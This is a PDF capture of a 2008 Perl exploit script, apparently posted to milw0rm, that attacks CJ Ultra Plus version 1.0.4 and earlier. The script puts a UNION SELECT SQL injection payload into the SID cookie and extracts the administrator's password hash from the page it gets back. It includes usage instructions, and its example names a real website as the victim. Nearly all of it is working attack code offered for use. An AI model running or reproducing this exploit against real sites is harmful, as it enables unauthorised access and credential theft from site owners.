CJ Ultra Plus 1.0.4 Cookie Remote SQL Injection Exploit.pdf

1 #!/usr/bin/perl 2 # 3 # CJ Ultra Plus <= v1.0.4 Cookie SQL Injection 4 # 5 # found and coded by −SmoG− /\GermAn hAckZ0r 6 # contact: ICQ − 266836394 7 # 8 # 9 # 10 # 11 # hints: − sometimes the parameter "SID" is different to the normal one... 12 # − i extract the hash from the html−code... but i was 2 lazy for coding a good working filter 13 # − salted DES (normaly "aa" will be the salt, but it can be different) 14 # − ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendl y with ur feedback... 15 # 16 # 17 # >>> GretzZz 2: pronoobz.org − Wesker, China Sun and all other memberZz <<< 18 19 use LWP::UserAgent; 20 21 if ($#ARGV+1 !=1) { 22 print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; 23 print "found and coded by −SmoG−\n"; 24 print "\n\nUsage: perl xploit.pl −victim\n"; 25 print " perl xploit.pl http://gayxboy.com/\n\n"; #LiVe−Dem0! letZz pwnz the pedophile! ! 26 exit(); 27 } 28 print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; 29 print "\nstarting exploit..."; 30 $target=$ARGV[0]; 31 chomp($target); 32 if($target !~ /^http:\/\//) 33 { 34 $target = "http://".$target; 35 } 36 if($target !~ /\/$/) 37 { 38 $target .= "/"; 39 } 40 @header = (’Cookie’ => "SID=’UNION SELECT b12 from settings/*"); 41 $ua = LWP::UserAgent−>new; 42 $ua−>timeout(10); 43 $ua−>env_proxy; 44 $ua−>agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"); 45 $response = $ua−>get($target, @header); 46 if ($response−>is_success) 47 { 48 $temp = $response−>content; 49 if ($temp =~/(.*)SID=(.*);/) 50 { Page 1/2 CJ Ultra Plus 1.0.4 Cookie Remote SQL Injection Exploit −SmoG− 09/22/2008 51 $result=substr($temp,85,13); 52 print "\n\adminhash: "; print $result; 53 } 54 } 55 else 56 { 57 die "Error: ".$response−>status_line; 58 } 59 60 # milw0rm.com [2008−09−22] Page 2/2 CJ Ultra Plus 1.0.4 Cookie Remote SQL Injection Exploit −SmoG− 09/22/2008